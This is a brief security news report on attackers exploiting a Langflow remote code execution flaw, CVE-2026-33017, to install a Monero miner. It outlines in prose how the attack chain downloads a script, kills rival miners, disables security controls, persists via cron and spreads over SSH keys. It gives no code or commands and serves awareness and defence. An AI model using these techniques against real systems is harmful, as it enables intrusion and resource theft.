Threat actors are actively exploiting a critical vulnerability in Langflow, identified as CVE-2026-33017, to deploy a Monero cryptocurrency miner, according to Trend Micro. This vulnerability, with a CVSS score of 9.3, allows for unauthenticated remote code execution, enabling attackers to gain initial access to enterprise networks by targeting exposed artificial intelligence application endpoints. The exploitation campaign was observed between March 27 and April 15, 2026, with further coverage provided by The Hacker News.The attack chain begins with a single line of Python code executed via an unauthenticated Langflow API endpoint. This code downloads a shell script that fetches and launches a cryptocurrency miner binary as a detached process. The malware is designed to terminate competing miners from groups like Kinsing and WatchDog, remove rival wallet data, disable security controls, and establish persistence through cron jobs. It also spreads to other systems via reused SSH keys.The miner binary, written in Go, disables security measures such as AppArmor, UFW, iptables, SELinux, and cloud security agents. It also removes system logs and manipulates file attributes to maintain its presence. The campaign highlights how exposed AI application endpoints are becoming a new entry point for threat actors.Source: The Hacker News



